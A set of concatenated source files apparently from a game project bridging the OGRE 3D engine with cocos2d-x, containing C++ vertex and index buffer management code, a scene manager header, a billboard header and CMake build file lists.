#include "OgreBridgeBufferManager.h"
#include "renderer/CCVertexIndexBuffer.h"
#include "base/CCEventType.h"
#include "base/CCEventListenerCustom.h"
#include "base/CCEventDispatcher.h"
#include "base/CCDirector.h"
namespace Ogre {
inline GLenum getGLUsageByHardwareUsage(unsigned int usage)
{
switch(usage)
{
case HardwareBuffer::HBU_STATIC:
case HardwareBuffer::HBU_STATIC_WRITE_ONLY:
return GL_STATIC_DRAW;
case HardwareBuffer::HBU_DYNAMIC:
case HardwareBuffer::HBU_DYNAMIC_WRITE_ONLY:
return GL_DYNAMIC_DRAW;
case HardwareBuffer::HBU_DYNAMIC_WRITE_ONLY_DISCARDABLE:
return GL_STREAM_DRAW;
default:
return GL_DYNAMIC_DRAW;
};
}
inline GLenum getGLTypeByHardwareType(unsigned int type)
{
switch(type)
{
case VET_FLOAT1:
case VET_FLOAT2:
case VET_FLOAT3:
case VET_FLOAT4:
return GL_FLOAT;
case VET_SHORT1:
case VET_SHORT2:
case VET_SHORT3:
case VET_SHORT4:
return GL_SHORT;
case VET_COLOUR:
case VET_COLOUR_ABGR:
case VET_COLOUR_ARGB:
case VET_UBYTE4:
return GL_UNSIGNED_BYTE;
default:
return 0;
};
}
BridgeHardwareVertexBuffer::BridgeHardwareVertexBuffer(HardwareBufferManagerBase* mgr,
size_t vertexSize,
size_t numVertices,
HardwareBuffer::Usage usage,
bool useShadowBuffer)
: HardwareVertexBuffer(mgr, vertexSize, numVertices, usage, false, useShadowBuffer)
{
glGenBuffers(1, &_vbo);
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
CHECK_GL_ERROR_DEBUG();
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, nullptr, GL_STATIC_DRAW);
CHECK_GL_ERROR_DEBUG();
glBindBuffer(GL_ARRAY_BUFFER, 0);
#if (CC_TARGET_PLATFORM == CC_PLATFORM_ANDROID)
auto callBack = [this](cocos2d::EventCustom* event)
{
this->mShadowUpdated = true;
this->_updateFromShadow();
};
_recreateVBOEventListener = cocos2d::Director::getInstance()->getEventDispatcher()->addCustomEventListener(EVENT_RENDERER_RECREATED, callBack);
#endif
}
BridgeHardwareVertexBuffer::~BridgeHardwareVertexBuffer()
{
if(glIsBuffer(_vbo))
{
glDeleteBuffers(1, &_vbo);
_vbo = 0;
}
#if (CC_TARGET_PLATFORM == CC_PLATFORM_ANDROID)
cocos2d::Director::getInstance()->getEventDispatcher()->removeEventListener(_recreateVBOEventListener);
#endif
}
void* BridgeHardwareVertexBuffer::lockImpl(size_t offset,
size_t length,
LockOptions options)
{
if (mIsLocked)
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Invalid attempt to lock an index buffer that has already been locked",
"BridgeHardwareVertexBuffer::lock");
}
void* retPtr = 0;
BridgeHardwareBufferManager* glBufManager = static_cast<BridgeHardwareBufferManager*>(HardwareBufferManager::getSingletonPtr());
// Try to use scratch buffers for smaller buffers
if (length < glBufManager->getGLMapBufferThreshold())
{
// if this fails, we fall back on mapping
retPtr = glBufManager->allocateScratch((uint32)length);
if (retPtr)
{
mLockedToScratch = true;
mScratchOffset = offset;
mScratchSize = length;
mScratchPtr = retPtr;
mScratchUploadOnUnlock = (options != HBL_READ_ONLY);
if (options != HBL_DISCARD)
{
// have to read back the data before returning the pointer
readData(offset, length, retPtr);
}
}
}
else
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Invalid Buffer lockSize",
"BridgeHardwareVertexBuffer::lock");
}
mIsLocked = true;
return retPtr;
}
void BridgeHardwareVertexBuffer::unlockImpl(void)
{
if (mLockedToScratch)
{
if (mScratchUploadOnUnlock)
{
// have to write the data back to vertex buffer
writeData(mScratchOffset, mScratchSize, mScratchPtr,
mScratchOffset == 0 && mScratchSize == getSizeInBytes());
}
static_cast<BridgeHardwareBufferManager*>(
HardwareBufferManager::getSingletonPtr())->deallocateScratch(mScratchPtr);
mLockedToScratch = false;
}
else
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Only locking to scratch is supported",
"BridgeHardwareVertexBuffer::unlockImpl");
}
mIsLocked = false;
}
void BridgeHardwareVertexBuffer::readData(size_t offset, size_t length, void* pDest)
{
if (mUseShadowBuffer)
{
void* srcData = mShadowBuffer->lock(offset, length, HBL_READ_ONLY);
memcpy(pDest, srcData, length);
mShadowBuffer->unlock();
}
else
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Read hardware buffer is not supported",
"BridgeHardwareVertexBuffer::readData");
}
}
void BridgeHardwareVertexBuffer::writeData(size_t offset,
size_t length,
const void* pSource,
bool discardWholeBuffer)
{
// Update the shadow buffer
if (mUseShadowBuffer)
{
void* destData = mShadowBuffer->lock(offset, length,
discardWholeBuffer ? HBL_DISCARD : HBL_NORMAL);
memcpy(destData, pSource, length);
mShadowBuffer->unlock();
}
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
CHECK_GL_ERROR_DEBUG();
if (offset == 0 && length == mSizeInBytes)
{
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, pSource,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
}
else
{
if(discardWholeBuffer)
{
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, NULL,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
}
glBufferSubData(GL_ARRAY_BUFFER, offset, length, pSource);
CHECK_GL_ERROR_DEBUG();
}
glBindBuffer(GL_ARRAY_BUFFER, 0);
}
void BridgeHardwareVertexBuffer::_updateFromShadow(void)
{
if (mUseShadowBuffer && mShadowUpdated && !mSuppressHardwareUpdate)
{
const void *srcData = mShadowBuffer->lock(mLockStart, mLockSize,HBL_READ_ONLY);
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
CHECK_GL_ERROR_DEBUG();
glBufferData(GL_ARRAY_BUFFER, (GLsizeiptr)mSizeInBytes, srcData,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
glBindBuffer(GL_ARRAY_BUFFER, 0);
mShadowBuffer->unlock();
mShadowUpdated = false;
}
}
BridgeHardwareIndexBuffer::BridgeHardwareIndexBuffer(HardwareBufferManagerBase* mgr,
IndexType idxType,
size_t numIndexes,
HardwareBuffer::Usage usage,
bool useShadowBuffer)
: HardwareIndexBuffer(mgr, idxType, numIndexes, usage, false, useShadowBuffer)
{
glGenBuffers(1, &_vbo);
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, nullptr, GL_STATIC_DRAW);
glBindBuffer(GL_ARRAY_BUFFER, 0);
#if (CC_TARGET_PLATFORM == CC_PLATFORM_ANDROID)
auto callBack = [this](cocos2d::EventCustom* event)
{
this->mShadowUpdated = true;
this->_updateFromShadow();
};
_recreateVBOEventListener = cocos2d::Director::getInstance()->getEventDispatcher()->addCustomEventListener(EVENT_RENDERER_RECREATED, callBack);
#endif
}
BridgeHardwareIndexBuffer::~BridgeHardwareIndexBuffer()
{
if(glIsBuffer(_vbo))
{
glDeleteBuffers(1, &_vbo);
_vbo = 0;
}
#if (CC_TARGET_PLATFORM == CC_PLATFORM_ANDROID)
cocos2d::Director::getInstance()->getEventDispatcher()->removeEventListener(_recreateVBOEventListener);
#endif
}
void BridgeHardwareIndexBuffer::unlockImpl(void)
{
if (mLockedToScratch)
{
if (mScratchUploadOnUnlock)
{
// have to write the data back to vertex buffer
writeData(mScratchOffset, mScratchSize, mScratchPtr,
mScratchOffset == 0 && mScratchSize == getSizeInBytes());
}
static_cast<BridgeHardwareBufferManager*>(
HardwareBufferManager::getSingletonPtr())->deallocateScratch(mScratchPtr);
mLockedToScratch = false;
}
else
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Lock to scratch is only supported",
"BridgeHardwareIndexBuffer::unlockImpl");
}
mIsLocked = false;
}
void* BridgeHardwareIndexBuffer::lockImpl(size_t offset,
size_t length,
LockOptions options)
{
if(mIsLocked)
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Invalid attempt to lock an index buffer that has already been locked",
"BridgeHardwareIndexBuffer::lock");
}
void* retPtr = 0;
BridgeHardwareBufferManager* glBufManager = static_cast<BridgeHardwareBufferManager*>(HardwareBufferManager::getSingletonPtr());
if(length < glBufManager->getGLMapBufferThreshold())
{
retPtr = glBufManager->allocateScratch((uint32)length);
if (retPtr)
{
mLockedToScratch = true;
mScratchOffset = offset;
mScratchSize = length;
mScratchPtr = retPtr;
mScratchUploadOnUnlock = (options != HBL_READ_ONLY);
if (options != HBL_DISCARD)
{
readData(offset, length, retPtr);
}
}
}
else
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Invalid Buffer lockSize",
"BridgeHardwareIndexBuffer::lock");
}
mIsLocked = true;
return retPtr;
}
void BridgeHardwareIndexBuffer::readData(size_t offset,
size_t length,
void* pDest)
{
if(mUseShadowBuffer)
{
// Get data from the shadow buffer
void* srcData = mShadowBuffer->lock(offset, length, HBL_READ_ONLY);
memcpy(pDest, srcData, length);
mShadowBuffer->unlock();
}
else
{
OGRE_EXCEPT(Exception::ERR_INTERNAL_ERROR,
"Reading hardware buffer is not supported",
"BridgeHardwareIndexBuffer::readData");
}
}
void BridgeHardwareIndexBuffer::writeData(size_t offset, size_t length,
const void* pSource,
bool discardWholeBuffer)
{
// Update the shadow buffer
if (mUseShadowBuffer)
{
void* destData = mShadowBuffer->lock(offset, length,
discardWholeBuffer ? HBL_DISCARD : HBL_NORMAL);
memcpy(destData, pSource, length);
mShadowBuffer->unlock();
}
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
CHECK_GL_ERROR_DEBUG();
if (offset == 0 && length == mSizeInBytes)
{
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, pSource,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
}
else
{
if(discardWholeBuffer)
{
glBufferData(GL_ARRAY_BUFFER, mSizeInBytes, NULL,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
}
glBufferSubData(GL_ARRAY_BUFFER, offset, length, pSource);
CHECK_GL_ERROR_DEBUG();
}
glBindBuffer(GL_ARRAY_BUFFER, 0);
}
void BridgeHardwareIndexBuffer::_updateFromShadow(void)
{
if (mUseShadowBuffer && mShadowUpdated && !mSuppressHardwareUpdate)
{
const void *srcData = mShadowBuffer->lock(mLockStart, mLockSize,HBL_READ_ONLY);
glBindBuffer(GL_ARRAY_BUFFER, _vbo);
CHECK_GL_ERROR_DEBUG();
glBufferData(GL_ARRAY_BUFFER, (GLsizeiptr)mSizeInBytes, srcData,
getGLUsageByHardwareUsage(mUsage));
CHECK_GL_ERROR_DEBUG();
glBindBuffer(GL_ARRAY_BUFFER, 0);
mShadowBuffer->unlock();
mShadowUpdated = false;
}
}
// Scratch pool management (32 bit structure)
struct BridgeScratchBufferAlloc
{
/// Size in bytes
uint32 size: 31;
/// Free? (pack with size)
uint32 free: 1;
};
#define SCRATCH_POOL_SIZE 1 * 1024 * 1024
#define SCRATCH_ALIGNMENT 32
BridgeHardwareBufferManagerBase::BridgeHardwareBufferManagerBase()
{
// Init scratch pool
// TODO make it a configurable size?
// 32-bit aligned buffer
mScratchBufferPool = static_cast<char*>(OGRE_MALLOC_ALIGN(SCRATCH_POOL_SIZE,
MEMCATEGORY_GEOMETRY,
SCRATCH_ALIGNMENT));
BridgeScratchBufferAlloc* ptrAlloc = (BridgeScratchBufferAlloc*)mScratchBufferPool;
ptrAlloc->size = SCRATCH_POOL_SIZE - sizeof(BridgeScratchBufferAlloc);
ptrAlloc->free = 1;
// non-Win32 machines are having issues glBufferSubData, looks like buffer corruption
// disable for now until we figure out where the problem lies
# if OGRE_PLATFORM != OGRE_PLATFORM_WIN32
mMapBufferThreshold = 0;
# endif
}
BridgeHardwareBufferManagerBase::~BridgeHardwareBufferManagerBase()
{
destroyAllDeclarations();
destroyAllBindings();
OGRE_FREE_ALIGN(mScratchBufferPool, MEMCATEGORY_GEOMETRY, SCRATCH_ALIGNMENT);
}
HardwareVertexBufferSharedPtr
BridgeHardwareBufferManagerBase::createVertexBuffer(size_t vertexSize,
size_t numVerts,
HardwareBuffer::Usage usage,
bool useShadowBuffer)
{
// always use shadowBuffer
BridgeHardwareVertexBuffer* buf =
OGRE_NEW BridgeHardwareVertexBuffer(this, vertexSize, numVerts, usage, true);
{
OGRE_LOCK_MUTEX(mVertexBuffersMutex)
mVertexBuffers.insert(buf);
}
return HardwareVertexBufferSharedPtr(buf);
}
HardwareIndexBufferSharedPtr BridgeHardwareBufferManagerBase::createIndexBuffer(HardwareIndexBuffer::IndexType itype,
size_t numIndexes,
HardwareBuffer::Usage usage,
bool useShadowBuffer)
{
// always use shadowBuffer
BridgeHardwareIndexBuffer* buf =
OGRE_NEW BridgeHardwareIndexBuffer(this, itype, numIndexes, usage, true);
{
OGRE_LOCK_MUTEX(mIndexBuffersMutex)
mIndexBuffers.insert(buf);
}
return HardwareIndexBufferSharedPtr(buf);
}
RenderToVertexBufferSharedPtr BridgeHardwareBufferManagerBase::createRenderToVertexBuffer()
{
// not supported
return RenderToVertexBufferSharedPtr();
}
void* BridgeHardwareBufferManagerBase::allocateScratch(uint32 size)
{
// simple forward link search based on alloc sizes
// not that fast but the list should never get that long since not many
// locks at once (hopefully)
OGRE_LOCK_MUTEX(mScratchMutex)
// Alignment - round up the size to 32 bits
// control blocks are 32 bits too so this packs nicely
if (size % 4 != 0)
{
size += 4 - (size % 4);
}
uint32 bufferPos = 0;
while (bufferPos < SCRATCH_POOL_SIZE)
{
BridgeScratchBufferAlloc* pNext = (BridgeScratchBufferAlloc*)(mScratchBufferPool + bufferPos);
// Big enough?
if (pNext->free && pNext->size >= size)
{
// split? And enough space for control block
if(pNext->size > size + sizeof(BridgeScratchBufferAlloc))
{
uint32 offset = sizeof(BridgeScratchBufferAlloc) + size;
BridgeScratchBufferAlloc* pSplitAlloc = (BridgeScratchBufferAlloc*)
(mScratchBufferPool + bufferPos + offset);
pSplitAlloc->free = 1;
// split size is remainder minus new control block
pSplitAlloc->size = pNext->size - size - sizeof(BridgeScratchBufferAlloc);
// New size of current
pNext->size = size;
}
// allocate and return
pNext->free = 0;
// return pointer just after this control block (++ will do that for us)
return ++pNext;
}
bufferPos += sizeof(BridgeScratchBufferAlloc) + pNext->size;
}
// no available alloc
return 0;
}
void BridgeHardwareBufferManagerBase::deallocateScratch(void* ptr)
{
OGRE_LOCK_MUTEX(mScratchMutex)
// Simple linear search dealloc
uint32 bufferPos = 0;
BridgeScratchBufferAlloc* pLast = 0;
while (bufferPos < SCRATCH_POOL_SIZE)
{
BridgeScratchBufferAlloc* pCurrent = (BridgeScratchBufferAlloc*)(mScratchBufferPool + bufferPos);
// Pointers match?
if ((mScratchBufferPool + bufferPos + sizeof(BridgeScratchBufferAlloc)) == ptr)
{
// dealloc
pCurrent->free = 1;
// merge with previous
if (pLast && pLast->free)
{
// adjust buffer pos
bufferPos -= (pLast->size + sizeof(BridgeScratchBufferAlloc));
// merge free space
pLast->size += pCurrent->size + sizeof(BridgeScratchBufferAlloc);
pCurrent = pLast;
}
// merge with next
uint32 offset = bufferPos + pCurrent->size + sizeof(BridgeScratchBufferAlloc);
if (offset < SCRATCH_POOL_SIZE)
{
BridgeScratchBufferAlloc* pNext = (BridgeScratchBufferAlloc*)(
mScratchBufferPool + offset);
if (pNext->free)
{
pCurrent->size += pNext->size + sizeof(BridgeScratchBufferAlloc);
}
}
// done
return;
}
bufferPos += sizeof(BridgeScratchBufferAlloc) + pCurrent->size;
pLast = pCurrent;
}
// Should never get here unless there's a corruption
assert(false && "Memory deallocation error");
}
//---------------------------------------------------------------------
size_t BridgeHardwareBufferManagerBase::getGLMapBufferThreshold() const
{
return mMapBufferThreshold;
}
//---------------------------------------------------------------------
void BridgeHardwareBufferManagerBase::setGLMapBufferThreshold( const size_t value )
{
mMapBufferThreshold = value;
}
}
<file_sep>#-------------------------------------------------------------------
# This file is part of the CMake build system for OGRE
# (Object-oriented Graphics Rendering Engine)
# For the latest info, see http://www.ogre3d.org/
#
# The contents of this file are placed in the public domain. Feel
# free to make use of it in any way you like.
#-------------------------------------------------------------------
# Configure OpenGL ES 2.0 RenderSystem build
set(HEADER_FILES
OgreRenderScene.h
OgreOgreSprite3D.h
OgreParticleSprite3D.h
OgreOgreManager.h
OgreNodeProtocol.h
OgreBridgeSceneManager.h
OgreBridgeImageCodec.h
OgreBridgeFileSystemArchive.h
)
set(SOURCE_FILES
OgreRenderScene.cpp
OgreOgreSprite3D.cpp
OgreParticleSprite3D.cpp
OgreOgreManager.cpp
OgreNodeProtocol.cpp
OgreBridgeSceneManager.cpp
OgreBridgeImageCodec.cpp
OgreBridgeFileSystemArchive.cpp
)
include_directories(
${CMAKE_CURRENT_SOURCE_DIR}/include
)
add_subdirectory(./ogre/ogre_main)
add_subdirectory(./ogre/ogre_particlefx)
add_subdirectory(./ogre/ogre_pu)
add_subdirectory(./ogre/ogre_rendersystem)
add_library(thirdparty STATIC
${SOURCE_FILES}
)
set_target_properties(thirdparty
PROPERTIES
ARCHIVE_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
LIBRARY_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
)
<file_sep>#ifndef OGRE_BRIDGE_SCENE_MANAGER_H
#define OGRE_BRIDGE_SCENE_MANAGER_H
#include "cocos2d.h"
#include <Ogre.h>
#include <OgreSceneManager.h>
namespace Ogre {
class BridgeRenderQueue : public RenderQueue
{
cocos2d::Mat4 *mCocosMatrix4;
public:
int mIndex;
std::vector<RenderablePass> mSolidRenderable;
std::vector<RenderablePass> mTransparentRenderable;
std::vector<cocos2d::MeshCommand *> mMeshCommand;
std::vector<cocos2d::GLProgramState *> mProgramState;
BridgeRenderQueue() :mCocosMatrix4(NULL)
{
for(int i = 0;i < 10; i ++)
{
auto glProgram =cocos2d::GLProgramCache::getInstance()->getGLProgram(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR);
auto programstate = cocos2d::GLProgramState::create(glProgram);
programstate->retain();
mProgramState.push_back(programstate);
mMeshCommand.push_back(new cocos2d::MeshCommand());
}
};
virtual ~BridgeRenderQueue(){};
void setCocosMatrix4(cocos2d::Mat4 *mat)
{
mCocosMatrix4 = mat;
}
cocos2d::Mat4 * getCocosMatrix4()
{
return mCocosMatrix4;
}
virtual void addRenderable(Renderable* pRend, uint8 groupID, ushort priority)
{
pRend->setCocosMatrix4(mCocosMatrix4);
//RenderQueue::addRenderable(pRend, groupID, priority);
Technique* pTech;
// tell material it's been used
if (!pRend->getMaterial().isNull())
pRend->getMaterial()->touch();
// Check material & technique supplied (the former since the default implementation
// of getTechnique is based on it for backwards compatibility
if(pRend->getMaterial().isNull() || !pRend->getTechnique())
{
// Use default base white
MaterialPtr baseWhite = MaterialManager::getSingleton().getByName("BaseWhite");
pTech = baseWhite->getTechnique(0);
}
else
pTech = pRend->getTechnique();
if (mRenderableListener)
{
// Allow listener to override technique and to abort
if (!mRenderableListener->renderableQueued(pRend, groupID, priority,
&pTech, this))
return; // rejected
// tell material it's been used (incase changed)
pTech->getParent()->touch();
}
// Transparent and depth/colour settings mean depth sorting is required?
// Note: colour write disabled with depth check/write enabled means
// setup depth buffer for other passes use.
if (pTech->isTransparentSortingForced() ||
(pTech->isTransparent() &&
(!pTech->isDepthWriteEnabled() ||
!pTech->isDepthCheckEnabled() ||
pTech->hasColourWriteDisabled())))
{
Technique::PassIterator pi = pTech->getPassIterator();
while (pi.hasMoreElements())
{
// Insert into transparent list
mTransparentRenderable.push_back(RenderablePass(pRend, pi.getNext()));
}
}
else
{
Technique::PassIterator pi = pTech->getPassIterator();
/* while (pi.hasMoreElements())
{
auto glProgram =cocos2d::GLProgramCache::getInstance()->getGLProgram(cocos2d::GLProgram::SHADER_NAME_POSITION_TEXTURE_COLOR);
auto programstate = cocos2d::GLProgramState::create(glProgram);
programstate->retain();
mProgramState.push_back(programstate);
mMeshCommand.push_back(new cocos2d::MeshCommand());
mSolidRenderable.push_back(RenderablePass(pRend, pi.getNext()));
}*/
}
}
};
/// Default scene manager
class BridgeSceneManager : public SceneManager
{
cocos2d::GLProgram* mShaderProgram;
BridgeRenderQueue *mBridgeRenderQueue;
public:
BridgeSceneManager(const String& name)
: SceneManager(name)
, mShaderProgram(NULL)
,mBridgeRenderQueue(NULL)
{}
~BridgeSceneManager(){}
void clearSceneManager();
void initRenderQueue(void);
void initSceneManager(Viewport *vPort, Camera *camera, cocos2d::GLProgram*);
void _beforeRender();
void _draw(MovableObject *object,cocos2d::Renderer *render);
void _render();
void _render(Ogre::RenderablePass &obj,cocos2d::Renderer *render,cocos2d::GLProgramState *state,cocos2d::MeshCommand *cmd);
void _afterRender();
const String& getTypeName(void) const;
};
class BridgeSceneManagerFactory : public SceneManagerFactory
{
protected:
void initMetaData(void) const;
public:
BridgeSceneManagerFactory(){}
~BridgeSceneManagerFactory() {}
/// Factory type name
static const String FACTORY_TYPE_NAME;
SceneManager* createInstance(const String& instanceName)
{
return OGRE_NEW BridgeSceneManager(instanceName);
}
void destroyInstance(SceneManager* instance)
{
OGRE_DELETE instance;
}
};
}
#endif//OGREAPP_H
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#ifndef __BERYL_BILLBOARD_H__
#define __BERYL_BILLBOARD_H__
#include "2d/CCSprite.h"
NS_CC_BEGIN
/**
* Inherit from Sprite, achieve BillBoard.
*/
class CameraBillBoard : public Node
{
public:
virtual void visit(Renderer* renderer, const Mat4 &parentTransform, uint32_t parentFlags) override;
CREATE_FUNC(CameraBillBoard);
CC_CONSTRUCTOR_ACCESS:
CameraBillBoard(){};
virtual ~CameraBillBoard(){};
protected:
private:
CC_DISALLOW_COPY_AND_ASSIGN(CameraBillBoard);
};
NS_CC_END
#endif // __BERYL_BILLBOARD_H__
<file_sep>#-------------------------------------------------------------------
# This file is part of the CMake build system for OGRE
# (Object-oriented Graphics Rendering Engine)
# For the latest info, see http://www.ogre3d.org/
#
# The contents of this file are placed in the public domain. Feel
# free to make use of it in any way you like.
#-------------------------------------------------------------------
# Configure BSP SceneManager build
set (HEADER_FILES
include/ParticleUniverseAffector.h
include/ParticleUniverseAffectorTokens.h
include/ParticleUniverseAliasTokens.h
include/ParticleUniverseAtlasImage.h
include/ParticleUniverseAttachable.h
include/ParticleUniverseAttachableTokens.h
include/ParticleUniverseBehaviourTokens.h
include/ParticleUniverseCameraDependency.h
include/ParticleUniverseCameraDependencyTokens.h
include/ParticleUniverseDll.h
include/ParticleUniverseDynamicAttribute.h
include/ParticleUniverseDynamicAttributeTokens.h
include/ParticleUniverseEmitter.h
include/ParticleUniverseEmitterTokens.h
include/ParticleUniverseEventHandlerTokens.h
include/ParticleUniverseExtern.h
include/ParticleUniverseExternTokens.h
include/ParticleUniverseForceField.h
include/ParticleUniverseNoise.h
include/ParticleUniverseObserver.h
include/ParticleUniverseObserverTokens.h
include/ParticleUniverseParticle.h
include/ParticleUniverseParticlePool.h
include/ParticleUniversePCH.h
include/ParticleUniversePlugin.h
include/ParticleUniverseRenderer.h
include/ParticleUniverseRendererTokens.h
include/ParticleUniverseScriptDeserializer.h
include/ParticleUniverseScriptSerializer.h
include/ParticleUniverseSystem.h
include/ParticleUniverseSystemManager.h
include/ParticleUniverseSystemManagerTokens.h
include/ParticleUniverseSystemTokens.h
include/ParticleUniverseTechnique.h
include/ParticleUniverseTechniqueTokens.h
include/ParticleUniverseVisualParticle.h
include/ParticleEmitters/ParticleUniverseBoxEmitter.h
include/ParticleEmitters/ParticleUniverseBoxEmitterTokens.h
include/ParticleEmitters/ParticleUniverseCircleEmitter.h
include/ParticleEmitters/ParticleUniverseCircleEmitterTokens.h
include/ParticleEmitters/ParticleUniverseLineEmitter.h
include/ParticleEmitters/ParticleUniverseLineEmitterTokens.h
include/ParticleEmitters/ParticleUniverseMeshSurfaceEmitter.h
include/ParticleEmitters/ParticleUniverseMeshSurfaceEmitterTokens.h
include/ParticleEmitters/ParticleUniversePointEmitter.h
include/ParticleEmitters/ParticleUniversePointEmitterTokens.h
include/ParticleEmitters/ParticleUniversePositionEmitter.h
include/ParticleEmitters/ParticleUniversePositionEmitterTokens.h
include/ParticleEmitters/ParticleUniverseSlaveEmitter.h
include/ParticleEmitters/ParticleUniverseSlaveEmitterTokens.h
include/ParticleEmitters/ParticleUniverseSphereSurfaceEmitter.h
include/ParticleEmitters/ParticleUniverseSphereSurfaceEmitterTokens.h
include/ParticleEmitters/ParticleUniverseVertexEmitter.h
include/ParticleEmitters/ParticleUniverseVertexEmitterTokens.h
include/ParticleRenderers/ParticleUniverseBeamRenderer.h
include/ParticleRenderers/ParticleUniverseBeamRendererTokens.h
include/ParticleRenderers/ParticleUniverseBillboardRenderer.h
include/ParticleRenderers/ParticleUniverseBillboardRendererTokens.h
include/ParticleRenderers/ParticleUniverseBox.h
include/ParticleRenderers/ParticleUniverseBoxRenderer.h
include/ParticleRenderers/ParticleUniverseBoxRendererTokens.h
include/ParticleRenderers/ParticleUniverseBoxSet.h
include/ParticleRenderers/ParticleUniverseEntityRenderer.h
include/ParticleRenderers/ParticleUniverseEntityRendererTokens.h
include/ParticleRenderers/ParticleUniverseLightRenderer.h
include/ParticleRenderers/ParticleUniverseLightRendererTokens.h
include/ParticleRenderers/ParticleUniversePrimitiveShapeSet.h
include/ParticleRenderers/ParticleUniverseRibbonTrailRenderer.h
include/ParticleRenderers/ParticleUniverseRibbonTrailRendererTokens.h
include/ParticleRenderers/ParticleUniverseSphere.h
include/ParticleRenderers/ParticleUniverseSphereRenderer.h
include/ParticleRenderers/ParticleUniverseSphereRendererTokens.h
include/ParticleRenderers/ParticleUniverseSphereSet.h
include/ParticleAffectors/ParticleUniverseAlignAffector.h
include/ParticleAffectors/ParticleUniverseAlignAffectorTokens.h
include/ParticleAffectors/ParticleUniverseBaseCollider.h
include/ParticleAffectors/ParticleUniverseBaseColliderTokens.h
include/ParticleAffectors/ParticleUniverseBaseForceAffector.h
include/ParticleAffectors/ParticleUniverseBaseForceAffectorTokens.h
include/ParticleAffectors/ParticleUniverseBoxCollider.h
include/ParticleAffectors/ParticleUniverseBoxColliderTokens.h
include/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffector.h
include/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffectorTokens.h
include/ParticleAffectors/ParticleUniverseColourAffector.h
include/ParticleAffectors/ParticleUniverseColourAffectorTokens.h
include/ParticleAffectors/ParticleUniverseFlockCenteringAffector.h
include/ParticleAffectors/ParticleUniverseFlockCenteringAffectorTokens.h
include/ParticleAffectors/ParticleUniverseForceFieldAffector.h
include/ParticleAffectors/ParticleUniverseForceFieldAffectorTokens.h
include/ParticleAffectors/ParticleUniverseGeometryRotator.h
include/ParticleAffectors/ParticleUniverseGeometryRotatorTokens.h
include/ParticleAffectors/ParticleUniverseGravityAffector.h
include/ParticleAffectors/ParticleUniverseGravityAffectorTokens.h
include/ParticleAffectors/ParticleUniverseInterParticleCollider.h
include/ParticleAffectors/ParticleUniverseInterParticleColliderTokens.h
include/ParticleAffectors/ParticleUniverseJetAffector.h
include/ParticleAffectors/ParticleUniverseJetAffectorTokens.h
include/ParticleAffectors/ParticleUniverseLineAffector.h
include/ParticleAffectors/ParticleUniverseLineAffectorTokens.h
include/ParticleAffectors/ParticleUniverseLinearForceAffector.h
include/ParticleAffectors/ParticleUniverseLinearForceAffectorTokens.h
include/ParticleAffectors/ParticleUniverseParticleFollower.h
include/ParticleAffectors/ParticleUniverseParticleFollowerTokens.h
include/ParticleAffectors/ParticleUniversePathFollower.h
include/ParticleAffectors/ParticleUniversePathFollowerTokens.h
include/ParticleAffectors/ParticleUniversePlaneCollider.h
include/ParticleAffectors/ParticleUniversePlaneColliderTokens.h
include/ParticleAffectors/ParticleUniverseRandomiser.h
include/ParticleAffectors/ParticleUniverseRandomiserTokens.h
include/ParticleAffectors/ParticleUniverseScaleAffector.h
include/ParticleAffectors/ParticleUniverseScaleAffectorTokens.h
include/ParticleAffectors/ParticleUniverseScaleVelocityAffector.h
include/ParticleAffectors/ParticleUniverseScaleVelocityAffectorTokens.h
include/ParticleAffectors/ParticleUniverseSineForceAffector.h
include/ParticleAffectors/ParticleUniverseSineForceAffectorTokens.h
include/ParticleAffectors/ParticleUniverseSphereCollider.h
include/ParticleAffectors/ParticleUniverseSphereColliderTokens.h
include/ParticleAffectors/ParticleUniverseTextureAnimator.h
include/ParticleAffectors/ParticleUniverseTextureAnimatorTokens.h
include/ParticleAffectors/ParticleUniverseTextureRotator.h
